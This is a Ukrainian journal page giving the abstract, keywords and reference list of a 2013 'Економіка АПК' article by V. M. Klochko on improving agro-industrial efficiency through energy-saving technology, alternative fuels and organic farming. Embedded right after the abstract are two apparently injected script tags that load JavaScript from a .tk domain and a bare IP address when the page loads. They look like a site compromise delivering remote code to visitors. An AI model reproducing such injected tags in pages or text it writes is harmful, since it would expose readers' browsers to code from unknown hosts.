ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 332.155.63
Економіка агропромислового виробництва

Шляхи підвищення ефективності АПК України / Клочко В. М. // Економіка АПК. - 2013. - № 1 - С. 45

Проаналізовано й виявлено актуальні напрями підвищення ефективності АПК, зокрема впровадження сучасних енергоощадних технологій виробництва сільськогосподарської продукції, альтернативних видів палива і органічних добрив. Бібліогр.: 10.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: енергоощадні технології, органічне виробництво продукції, нанотехнології, альтернативні види палива, зелений туризм

Список використаних джерел

  1. Актуальні проблеми аграрної реформи в Україні в умовах системної кризи світової економіки / [І.Г. Кириленко, Ю.Ф. Мельник, М.В. Присяжнюк та ін.]; заред. І.Г. Кириленка. - К.: Аналітично-дорадчий центр Блакитної стрічки, 2009. - 138 с.
  2. Бузовський Є. А. Інновації енергетики: нетрадиційні й поновлювальні джерела енергії / Є. А. Бузовський, О.Д. Витвицька, В. А. Скрипниченко // Агроінком. - 2008. - № 5-6. - С. 50-53.
  3. Макаренко П. М. Цінова політика як фактор підвищення дохідності аграрного виробництва в умовах Світової організації торгівлі / П. М. Макаренко // Економіка АПК. - 2008. - № 5. - С. 44-48.
  4. Мельник Ю. Ф. Агропромислове виробництво України: уроки 2008 року і шляхи забезпечення інноваційного розвитку / Ю. Ф. Мельник, П. Т. Саблук // Економіка АПК. - 2009. - № 1. - С. 3-15.
  5. Месель-Веселяк В. Я. Вирівнювання економічних умов господарювання на землях різної якості / В. Я. Месель-Веселяк // Економіка АПК. - 2009. - № 3. - С. 97-102.
  6. Месель-Веселяк В. Я. Дохідність і розширене відтворення в агропромисловому виробництві / В. Я. Месель-Веселяк // Економіка АПК. - 2008. - № 5. - С. 12-17.
  7. Месель-Веселяк В. Я. Ефективність енергетичного самозабезпечення сільського господарства / В. Я. Месель-Веселяк // Економіка АПК. - 2009. - № 2. - С. 10-14.
  8. Про схвалення Концепції Державної цільової науково-технічної програми розвитку виробництва та використання біологічних видів палива: Розпорядження Кабінету Міністрів України від 12 лют. 2009 р. № 276-р // Офіц. вісн. України. - 2009. - № 21. - С. 36-39.
  9. Про схвалення Концепції Державної цільової науково-технічної програми «Нанотехнології та наноматеріали» на 2010-2014 роки»: Розпорядження Кабінету Міністрів України від 2 квітня 2009 р. № 331-р // Офіц. вісн. України. - 2009. - № 26. - С. 57-59.
  10. Супіханое Б.К. Перспективи розвитку агропромислового комплексу в умовах членства України в СОТ та формування зони вільної торгівлі з ЄС / Б. К. Супіханов // Економіка АПК. - 2008. - № 11. - С. 138-144.
Читати статтю: 13_01_06.pdf